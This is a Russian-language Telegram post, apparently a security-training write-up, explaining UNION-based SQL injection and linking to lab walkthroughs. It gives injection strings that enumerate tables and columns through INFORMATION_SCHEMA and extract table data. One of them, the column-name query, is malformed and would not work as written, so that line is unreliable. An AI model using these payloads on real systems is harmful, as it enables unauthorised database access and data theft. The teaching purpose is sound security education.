TGViewer
Coffee cube Coffee cube @coffee_cube · 475 subscribers
Post #87 307
Привет^3 😈

Продолжаем копать в сторону SQL-инъекций. На очереди UNION based injection. Предыдущие разборы можно посмотреть туть:

✍️Что такое SQL инъекция
✍️Blind SQL инъекции

Данная инъекция основана на объединении выборки данных с помощью UNION.


SELECT column_name FROM table1 UNION SELECT column_name FROM table2;


Если мы нашли уязвимый параметр и поняли, как обрамлять данные(например, ' или ", или вовсе без кавычек), дальше нужно:
1. Определить количество колонок в оригинальном запросе;
2. Найти колонку, которая отображается на странице;
3. Начать вытаскивать данные о БД с помощью функций типа database(), version() и т.д.

Получаем названия БД


'-1' UNION SELECT TABLE_NAME, 2 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()--+


Выясняем название колонок


'-1' UNION SELECT COLUMN_NAME, 2 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=(SELECT TABLE_NAME, 2 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()--+)-- -


Вытаскиваем данные из таблцицы


'-1' UNION SELECT news,2 FROM table_name--+-


Собрав информацию о БД мы можем вытаскивать нужные нам данные. А вот список разборов на лабы с данным типом уязвимости:
✏️SQL injection UNION attack, determining the number of columns returned by the query
✏️SQL injection UNION attack, finding a column containing text
✏️SQL injection UNION attack retrieving data from other tables
✏️SQL injection UNION attack retrieving multiple values in a single column
✏️SQL injection with filter bypass via XML encoding
✏️Visible error-based SQL injection

#web #writeup
@coffee_cube☕
  • ❤ 2
  • ✍ 1
  • ❤‍🔥 1
  • 👍 1
  • 🔥 1
  • 👨‍💻 1
More from @coffee_cube
  1. Sep 16, 2026Привет^3☕️ cron есть почти везде, а оператор @reboot выполняет команду один раз при загруз…
  2. Sep 11, 2026Привет^3☕️ Достаточно богатая на события неделя. Вышла запись моего доклада на OFFZONE 202…
  3. Sep 10, 2026Семечко от Mango. Разбираем и воспроизводим уязвимость в роутере по описанию с NVD 👑 Стат…
  4. Sep 10, 2026Привет^3☕️ А у меня статья вышла. Сам в шоке🫤 ↖️ 📕тг • 🤬чатик • ✏️посты • 📹yt • 💞Twit…
  5. Sep 9, 2026Привет^3☕️ Свершилось😇Наконец я выступлю с докладом в своем городе и мне не нужно собират…
  6. Sep 2, 2026Привет^3☕️ Реликт до-systemd эпохи: скрипты в /etc/init.d/ c обработкой start/stop. На сов…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →